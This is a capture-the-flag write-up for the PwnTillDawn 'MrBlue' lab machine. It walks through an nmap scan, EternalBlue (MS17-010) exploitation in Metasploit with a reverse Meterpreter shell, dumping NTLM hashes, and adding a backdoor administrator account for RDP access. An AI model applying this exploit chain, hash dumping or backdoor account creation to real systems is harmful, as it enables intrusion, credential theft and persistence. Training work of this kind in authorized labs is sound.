ptd-mrblue-private

As always we start with a nmap scan

# Nmap 7.80 scan initiated Wed Aug 26 10:02:31 2020 as: nmap -Pn -oN 242.nmap 10.150.150.242
Nmap scan report for 10.150.150.242
Host is up (0.031s latency).
Not shown: 986 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown

# Nmap done at Wed Aug 26 10:02:39 2020 -- 1 IP address (1 host up) scanned in 8.18 seconds
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $

.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.150.150.242
rhost => 10.150.150.242
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.150.150.242
rhosts => 10.150.150.242
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.66.66.210:4444
[*] 10.150.150.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.150.150.242:445 - Connecting to target for exploitation.
[+] 10.150.150.242:445 - Connection established for exploitation.
[+] 10.150.150.242:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.150.150.242:445 - CORE raw buffer dump (53 bytes)
[*] 10.150.150.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.150.150.242:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.150.150.242:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 10.150.150.242:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 10.150.150.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.150.150.242:445 - Trying exploit with 12 Groom Allocations.
[*] 10.150.150.242:445 - Sending all but last fragment of exploit packet
[*] 10.150.150.242:445 - Starting non-paged pool grooming
[+] 10.150.150.242:445 - Sending SMBv2 buffers
[+] 10.150.150.242:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.150.150.242:445 - Sending final SMBv2 buffers.
[*] 10.150.150.242:445 - Sending last fragment of exploit packet!
[*] 10.150.150.242:445 - Receiving response from exploit packet
[+] 10.150.150.242:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.150.150.242:445 - Sending egg to corrupted connection.
[*] 10.150.150.242:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.150.150.242
[*] Meterpreter session 1 opened (10.66.66.210:4444 -> 10.150.150.242:51229) at 2020-08-26 10:09:19 +0100
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:483c7adb3e1378e9a187b42baa228745:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 3660 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

c:\users\Administrator.GNBUSCA-W054\desktop>whoami
whoami
nt authority\system

c:\users\Administrator.GNBUSCA-W054\desktop>

c:\Users\Administrator.GNBUSCA-W054\Desktop>type FLAG34.txt
type FLAG34.txt
c2e9e102e55d5697ed2f9a7ea63708c1cc411b79
c:\Users\Administrator.GNBUSCA-W054\Desktop>

c:\Users\Administrator.GNBUSCA-W054\Desktop>net user /ADD puck Geheim2020
net user /ADD puck Geheim2020
The command completed successfully.

c:\Users\Administrator.GNBUSCA-W054\Desktop>net localgroup administrators /add puck
net localgroup administrators /add puck
The command completed successfully.

connect with rdp
┌─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.242

Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *